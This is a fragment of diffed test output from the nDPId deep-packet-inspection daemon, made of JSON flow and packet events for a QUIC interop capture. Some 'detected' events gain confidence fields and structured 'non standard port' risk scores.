-00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434670,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":46242,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"test.privateoctopus.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00916{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434670,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":46242,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"test.privateoctopus.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434670,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":44619,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02149{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1603816434670,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434670,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUApCJAAEARDmPAqAGAjOM0XK5LEVEE7HYoyAoKCgoIlk3\/sw8\/b8wAAETStyAajltT68+ELYCklsRAAPKAhQKMXFJKXjIBWFRGvhiDbyM2RmA52mTO4kP\/LrjWRFOsZXPJwPYxhAgmyxVp2EaKhvInx5Lw6HoctLCI997uZ1ErbFrvVx2kMNsPbvf0c3KMKg04dEw3CGmIj1nwwAV3TplnDlLA8nGhigvTtzDcOYuThyFe7PNCKGoMhnIJglojVVIsBdMJYdSb90I\/+fQVaZ\/MIgmBIoSGWUE5ZAGntmDgtp0dgmx\/\/p7O+2ApCOoZi2+ZG1i32q4n752EIFh9R1W9\/09HXsuHjyhRiyoUZgqfvLkrSOvdv2ZApV3VMcrOD182D\/IFqwmSJhEKqa3Gz0XQ7x1AhDvKB\/98pdfLJuGPyAwXeMf3RbsjoJ7UbwIjIEtg2aJPV4zFaASkuBedOA0xRnIgegCv4bmWgElYnQC3X2r85hddZMtDhxN4hidUWYN\/uvDzyKGj38LAsQE2LOY\/U4yjUes\/A4X3Db4RMeoGGuaTPx8vHEhWcAZIkak3bdmdfUCKhTRw1Sobn\/0WZO3JeU\/O3LN6aaFNpd44oi+fv1YoqhJLtxNGYHj6lTz\/xWvwh\/5OpWupvnaRJw140wePCUI03nAaDAbvdgZhJxJUM9Ez2imcu\/DPUQxAcI87gwO9rHzyEFTZvBE2fYXUdWQ\/lBLvDIIIlbqrIBwZN4Rm1K7rJEsqaSGAetVKqYqrotg3G0Xv61dakHj\/9j5SGgi\/fc4wYQ4pRjWW7gItXzVqCglacLb3JoibdGgtA9WYGsZizewIUhH3c6imISZ6jCjLrzmXYytkHa2NT60DFmqp\/vbUzMpbFIHZoMMMlZrZErLgQqwcQrIy3BrvnbjZx8ZBklzbGPAwWqCy+HTuUfRLftp\/kFiVk1D\/72KMbyr6s7Bkxhgo4bI7zvMOHUidZ2hdC7UGsUUF\/x5smJeYW4wNdHD5iv58qpr6HaH2Rdza4ULK\/pyl75oX9CDKuX6jrGDlbgHOykS1bvJCTRfYwBjtGXraF58jEQVZJJ6HImPxPLTVvhi1weX0G57pwdQK\/6eBVH95xHZHTJaU4Kw3RS3xIWdjP6LitM0DZwW6TtS3P2G33o2Wkp7Fc9Y1dXTKUMs0nCmH9d7CCnjVWLYi1dhtz+Tta6lf48tU\/Qqf+zHItaHY7LtapxEIIsNEmVNQuXDZMbBZtU9UWcCYPTIXOZsOuWi+KlnlEVjhzxN\/kL7Rx56YZNVto9cOmH\/bByewHjhP8N44u7cip7U0HR+jmMmuxSSFw8RHPveSA9s0JovEVcJmQ19M5ynV7yxMWdfjeOMYtsTVM0tONAfzs92B1HE+34bwQSIOaG8X7No01hV+V\/yj+dryeODPmr1LKIAJ\/MbgypzFmTw29gDvyUBXq+ZwqdS3iCKSfowPes0BSJPSzSUi4Z4dIaBSLQpt9PNBOgH0m+JbP5PlkMRT2nmJjGR3PzvdWiWmCFTAb5JDoyjuyFHdi3lWKONx+lFmzZJwxs+UMErRJBVTz8V6tf9wiTJCTFmYGF4UgB\/CTJx3DI6wbo9X53d0S0QTy3dGXJZO\/H8qOsGI8aNw1qzLXLU6KpohKtMy7TWM8yk8onvWWarA524pLpTHLJknBb\/q73gznwGfXGsA9dvY+vw8XuLELA=="}
-00891{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434670,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":44619,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01000{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434670,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":44619,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 02132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1603816434674,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434674,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAc6RAAEARGHTAqAGAKHC\/PLXwEVEE7EM\/ywoKCgoIUh1YuhDqcyAAAETSyJu8rPDcY2Zmg9uhZvVGBSUtVHXbCogcrtjHkIZvyHG+oeQ7FMn5l9+yu4riTWt9G4+IRLvodWF\/OJuoo6CqqAN5qJoCM2wclVmCRhZ0yQpnR39UyeNNZNj55s0biH2qmAqdK7slUkz7cGbucaEPgYcjaZ1qoQwZ3r+tJVP2\/OosjKKgI3ssy6b8rBby+2gKA6tqrWlo4j913jt0V5Myxk6\/qG4m7XLGNhI+nqBnhUE9EJwSRwQbLcrG1YPxrCPYFKhaONrMEZrfUQUokRl+FtZYxnK7kRHiDzvfmlVCIPnCHsK+5SDQIbVAkCmMUWxjZ3bcH0rMAJZjsUd13Mp827NwaPY1eDE4xURESo0uH3LaTB+cGxcmZiI1vjnmW5fkVYKNgRSg0LQtDAGzCxaf9M30heOBY4ij6gT6HUWwVg+\/JFFdRax7wIj+qnGHaTs+tirGGEnbomoy1juUgYZn3ol7W9gFpvOFFGfsT9glqttgJXgMLwaC66I5aigEznfj7F8whFTNHLDojz+A60t6JiMTNVJkEgkdgm3rvpiMCW15t6bApORRa5kVOHruRwVYI10UY7IsHOtU6782GbDZSpGr8ntN8sySw6dOku3uT76aTNaaNtW\/2\/SmZ6WiPXDUGFDezYRwnESar9Jps0+5gYGAogq9ycMTf2y0dC4uoffSPWz1EdfmGrYbBIJCM9xuPdTrwpA6ThIjDDFV\/a6MJaOn5xQl6aMEUqPMHj458lJHEgyVojPxewoZCn1jkXsVl3BshvNc40UloZP\/zq2QIIDXt8Fodu3I71j4TQet+ImZTuvbDliPLbMm\/UuGwX7wyxtGWarNp2rii5+q0UaxBVtO8\/oJYF0+p44Z\/6vIrPBqNKbPEzkHUHiQQ9awnKGtngmRd0EnWA1J1Y87Abt4Qy51cs2KvlQ8aNSkmdJNosK8Lplp4c9AiloRm+Wlx6dF2sPcBXzpXCJ1Zlb\/eS7cm+1Of3sizAGLukg4XoSb8ue\/DVtfTnqnMgdaKnjOTE4lwUDNk1dzsHxmIBEdGAbUpr+sz2h7ZiHbtdfQRMC8R65ogyaeDK4C1lsoJ7uCJnAWZYyCp2BgnCpvONxxWtaYB6uz0UzVRleBEeiLenAlMfVHpx4w4aBWlyfvuTuObpJLNHDWzAbZSgjHkN3ZYnwTzsuPAriOrYPf6ATtgw+ny2XHg\/qI3joZ2eO+lgJd87BsLnTQUd07WAQILuYO6jQ9vvkRRzosU72uqVr9x1lpfayG4CEyt0LUHBSmhuPmLena56\/to8FPfnyS9lNyeUIAaI4Fe4R3\/cEHg8NHDOKfjqOhNoajIZ8hm564A0lQ7hQTdBfGSgEwYSiDVP6eZcG+q0lw0017Nrj5WZoVrDtJB2VmZc8vjaptwWTVWvSIds8zNI205cr+tldoXLWshLEkoE0W0QepIpcvJTYL76KEZPhOvEWN08HQuMtxYugoC0qCkSsgCEXMCRpKiTlmRwjkQSmHvPZvjNte3BsWsO0fzr7S19GB7OyjGnnDBaF02DOLob0KkURE8IUAwhzi50lzUy41R1QjTFR94lQA9n5SPLtvlqTYWDXlIlyHzlvKnztl7SJtU\/J2mGtnwVygn3oE2zBGLJfYgi3ZH3hoCHuyTU70yw=="}
 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1603816434677,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":97,"pkt_l4_len":43,"ts_msec":1603816434677,"pkt":"PKn0qB\/spJGxgjQ5ht1gBwV2ACsRNCoArABAAAQAAuBM\/\/5oGZ0gAQsHCsnVrqTT\/kdpHoB9EVLMLwArOxiAAAAAAAAIjowvkCXlc11FR0cg\/wAAIP8AAB\/\/AAAe\/wAAHQ=="}
 00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434677,"flow_last_seen":1603816434677,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434677,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":44243,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1603816434677,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434677,"pkt":"pJGxgjQ5PKn0qB\/sht1gDEm8BNgRQCABCwcKydWupNP+R2kegH0gARnwAAQANAAAAAAAAAABrNMRUgTYSrXMCgoKCgj2S26kHUj2aQAARL4Oqb7kxp8VwqfBhPdfdtQhtwUXSB8\/M16zqaKTaiM4uFSCgiApTua+W3aFO11E8\/vpjw5fdiBSABUTDotMg5RkiQr0MSpUaARnrP0PNMBaoZi0T3torsgUpfH8Z7GKLvwTGd3hbCPXQz5HEzUHjJnObkXYOU8pDBMRAGZYnp5rkZbRT2vPBVCj8Cvx8bBBKneUgl1FG4uQ4EwyOma55O1RYgmn2Ynf1Ko5xhvyQTnOGQ+R1VyW0n7heo02IMCfY4VWPj\/QJHyKTPMBIDBtSvz3J6mf3nv69QC6K+3y7kTFVD4RNSmXPDKfJ4r8a\/jVYQ3tiwvsysKnCLgA5zby1+dfPHEiaiwawfH+cKDMssE48zXk1+MDRnahgP5\/5W7h5R0W7WQX3skNYTREacQ3LvDACn58ERfFzl2AshIb29QMiGQj+aXYqT7ftIu1mYCEtR10HqM0E0tdjMJlVoxU1sQCMNHCcSjur932nDLMq95bmJ\/epzRqKtYXqFfJm4ZnhGTZV2QZB+hX7pNkAbrVOicdWh6ASPsIKRVzbgM4azW3TFLOWbFSWksd82BdcgW3kBeZ+Zy87igudzpPx0kdISA+wUJUrSUaJmejNXcUK68sicz01uq+5FBxl7uzJB5i2OXGU+jvmL+lkKweCPtvayVLhcuvz7KLW1nrXu3HU\/E\/bgsaTJyGVokl31OFOSR9LQtdKuoewFPyn5r490C8zNMeXqpImt2kn4Tr\/jlH\/fxzyim4MX4msP404e3jLfo+J9lzJhkenDu9xAnUgd\/iKSb6RgtGPU4Y6NI2QNpIfd6MzugcP8a0lodftPQcResoW35Hgg5t6I+PqN5frd2jtB5RiFyFN6yYVSH5fwqpb5sgLyM2ZMvumoV6ZVCMO3EMaRJu6f+U3CDduLYbXqPjXTUFXnzx9Vt03+YreNFX6wa5PrrBlSKMZP\/2WAmhb8cWINvyoZmFlnI2qd6sXg1dpFNY99Vqu1GrXPgV8Qi9MxV9uHzluuqG5swDMVT91S3LeU6XPmicYuwxrVZ0fDoeWpn4Kta0sEVDVUOf9hI8REFrn\/lLtMViNZ5rtWhIMKLyMIne37ob1RynB8J3PHqTTUqyQWLUmsA7XpXuycyFg0eDsVEBgiX65miUosWBtlhptbWoDODs0zqjlEGqOg5rKyio59+SI+p7jTV93mdfy9Wt2QGrnsPSiOSsj\/pqM\/pZ2PPrcgdTK9VPceK3CdsRz\/jNTpieviefPJXgnQD9JDKvgbRzI7jy8hldn4q+BSAvi3W0FwGFIYHJsgwTS2D+M4jyoohPca8fHwPwrKPUAytl3yLskOFTcOEOwWAP0YkHc8DSZIYnWDfZRitncpUl9qEcnjpTihvHHfw2HQxFR5lkMlUwBOL06kpNLUObIMz0gJ8az8O5U2MJseOwsScI7UtAgMA1Wat1Jr7S5b3fSl1DVUzvG0hnyrSZS2C54u89rSG8QQybBKCeSDnq1GpKeq\/O7HdjP04WmFuLDA\/vf\/9lSaOXhNpEErLndSFsHzNaPYP8EGwGI4iaWZOfcrm8FyutSUmLAlYtemRojNwXfa2nJlp8muaoRnKD2oN1ySI11a6rSv0gyOvlVRJ5egXWtg=="}
-00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434677,"flow_last_seen":1603816434677,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434677,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":44243,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.rocks","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01022{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434677,"flow_last_seen":1603816434677,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434677,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":44243,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.rocks","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00642{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434678,"flow_last_seen":1603816434678,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434678,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":38394,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1603816434678,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434678,"pkt":"pJGxgjQ5PKn0qB\/sht1gAjrXBNgRQCABCwcKydWupNP+R2kegH0mAB8YIxDSMFEDfZ59dTdPlfoRUQTYrGTHCgoKCghDKzGtBgOvzAAARL61MEV7YMQkWdmZghiuiQz1o5QNdpzYuutf\/wdJhEZL1cudV76JEdjtP0Y3OyHIvIbsmMmNX4mYnmIsf1njial3e905frw0uHyw4\/f+5H0ef2WAdacdKOP40DoDeuCFxQz4bIKDgm8hBJ7vkD1IMm7AaEpvUQhSLgN8f+x+sA9RH+TmObL9fghOs+eNxWf96HoP4pMWR3XqHFfSqIk5FX3TNVvr+riiEz6IuctzVwm\/zqWSmC9dmXci8Fui7Q8OxkH6gLCU+aYM9wrrVZJ9j5ya5VCMnDAttNuuPdq5z4cDdXloIyyGypYPGlULxwG65oqg8RxhEo29up9ffJVpEaQX8UGyxOt3ZFGPweILYH6rNyUpje\/uB9d\/2Tqi9fZfaLpagN9mrVHJYMlLvkjpSaeasCrG6FDs+Nh7j2i5xAxuAkQ0xK7QS1Hlggg20h5t9cMg6O780ayQOD4SQCU+0AR1BtVV6iTy8Q0dm9tIpKWeNO7CSURoIrvTXKHBx5OXHuDteNJNabHxEW6\/e\/OGRw8IMWO65lgJPUK\/p\/99LM38gOa9gV2dzOdfDcRMvpSWbp3E44GpcUzlsSO+wF7JBY6P9esQ3iafS\/xZ5rdGYm06lyYTCDffm6X4KxkSuGJfTJKvPfMGPtO7M1PMG\/4y9kmbFwotO70O3qzn76AeIsqparz4gqE2VEl8QpfdxQliRyqZUZsoWB5UziEcGYDOQAbZw0c82QzSgLib58kPXBug4vmPNM71D9PmG+ZxduAFDFdu7EkUfNSxMfR6hOQumdYRVQ+J+QuJvYZ4r8AlRlJcX6HQpLdQXTOStQMDY7ErsX3+lkhbFCkOUvVD1zPSZ3X9i\/Jl3XL5dbrTO0oYnJiNAJHokvd9x91UJlo5E9+m85+BWm+iMzm3+6bNRAaSQKQrjdjennHLWo7GXNi4AtuurC53Pep+V5GsYHEa33KdpNHgca7X0HexhNHc2ElVJlmKiO9osCGww9ceX9y1pVU1v4UF5cspUvQ5RkcxirKgmOqDN1dbnXmgpQwLWcEgtJk0m+iyn9xNTJhEsJCf4M2GThouE0XLF3rBbGR8AaMV8IgL1g4CrqnSeTXeC0TiPef5r0N5Ew0ni6DodVZqUqNOv+QdCVcZaIWofYvBzMdvqE6zhO4AzOTz4GAPej5UV34aUDRCl13vR0NWFf5GvaZquOIg2EYE\/YyJl2nILl86w\/YT7aCfJJltdrHwSxGGAm2JodfqLx42fCKG98UlucLIjp39SZj8UGSr\/xymfE+UQrmVP\/eIDKUfQ\/F9RzSEtE4Gywjiw+VYseozSQwwkW8vYlep8AwdQshSEv4BOVgTV1jTbJ7jHDu3x3W7Ka2SYTSb3Yt+KkdDWxpTmyTJioeUboa1C8BSpZMyhJwlf1bmECMTVdLKtJOVuXslMtlUCVIAqqT9OTre4ouFYJNjliLNU9F808vVjFTZqlwwQjwIeKMK9tlRJNZxnWX+u5Tmaz0QgLbCP6pKnk6GGff9hBXEoVtopyfSJnogk4UBU3qLzTqqNWTse2gikbJRX2feLSYh9ICdhs0jcaXO512YMcM3tN6524plEU+japLcwChj4baYrOQTz7NVY1HU6hrUlA=="}
-00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434678,"flow_last_seen":1603816434678,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434678,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":38394,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"test.privateoctopus.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434678,"flow_last_seen":1603816434678,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434678,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":38394,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"test.privateoctopus.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 02144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1603816434679,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434679,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUArn9AAEARHfrAqAGAyu7cXJXeEVEE7GpTygoKCgoIN5KvB9nft6kAAETSd859O5gTcUYdl0d8aIlRj3zx4AjuKGa4ASMymO7vXZjT6sVM6pCw7HvmCO7cFlITvmBGM4kZgYz2DWfjjS2UhT8z6S+u4ZuqQnP6sPmHL0WtgrbFimoDsZXEWh5x4WsY15wAJFswtYDmxQkwEBAjgyKuyRv6VywYakyk9BNgIHVKy7BfjK1rPoWZ5w5I2hl2yWFdZ1\/dE9wNP5q3XxjhqAOQa4bzoBKefCRP60vRescDr5A1q9Gh9rEI1UxmIZexsLIorUS6jw27c7X3IRHEFYnp7damMbgudCUNTZ0D5\/x2EYQKzoV23CePPHf7CWo9eYf6XRWEJIBGs5xS8ziNV5+H6hYANEPNNnvMqWmg1CtTp6rU+5R3i7\/FA2u3qMYhl9YXtwck1Tx2THWWJnPTlV31JToDh9hcEx6ePHf\/HDVkBKTcysw+7WUh4g1S4U\/E6GwOzJUSl1j4FyQSA72MFR1nukBmK5l3E7lnPPMHE0UwlBbgRRjJIWWWMjukOyYVX7HOM8mWhaZJs8eEj1aINh\/eg4bAf1JY\/ufLTloR31S7y6OReDYCA\/J8a\/ZHMCpyo\/cgCYZnXroSqO5eUMiOd6mWZMV3WlojmNGGqUwidDXDOOAZnauH05acuiWNjN1drZ9uLl7kCD3klbBaB69xmhwOXqhlY+ov6Mo3v8dkwR3EXQE3Cj\/lQ4KJ2OrXiOlAmz\/GweVF9wuMVbg+hyvL7DdfTfw2qYLKgSNqwlGvO5T2f1lglyHLXCucOL7n\/zNjX0\/xlVOCxhUkQhgX\/XGJbbA7qxh9UXxvdZ3egx7Bshhqr1n6BUMoFOpjvUuGdgO0OjUEdRk5Gyk2HkFljHDaGm4ht4bH9hDtZ6HYm7nqyUay+Gd+WMBexYGDLQ2kaYG8GnHD4PrlcFbEvk3ju9rGX1R2QtLYbACEJdNJ\/zEc2GzZDjRz1o1gvI2iG\/x96iCGyzUz1N\/+nAKV+q5s2K22NkRxb1jIgd\/41FenkfbgFmpz0CA\/DQCyiLHlX2lw10drz3XG0f8LJfTp2vzPq\/+gH2c2gRSj2YcaBCyDTY5AKtyDkOEZKSL3C2C8JmYr4iJS8RMpB0jL35JgLPvSFgcoNymNWAjCjfeRN9n7RfdzVEX72bqAPdPKtdKHRkZOWGqcrp9n5GGjnQWG\/Jwx6RR+qXT6KecYDU2tCsKg\/XBFBnLfBCe2RP1K2zPx4D0wUdqR6tPZpisKmvW9Y3UI2tmUo9tLMaYgnRgRJ8M4\/14reEvtbK2a7xa1D+9b4yQoAoVStwjeuCruASzB76vQ7Oikq\/y28NWNAE6l7JAxtLpbUGRtWL7EwfR3329LDfnglJf6znmUiNxo5AmhhQH2+XGsnwv7e2QwJKwUtxfbSP6qjjAq\/IHu8Ph2sxgzDmxzqJS6NBD5\/rREJkwIRDPsPQN1aQTeYN2N94Pv5crstjdG+7f9DC85NWJZAJRxBLehoQTlbi\/SnUmr9i8puHfTCKc8NDOGVlMiWSfVcSKswlSyz9AjvXr\/Y+TehMUjsxQeL0lUqcIXfqPcJlum33ICV492562h19036aZai6yQ0yHgw3hE7aGMjyObE+Uh9o51GqJfXzY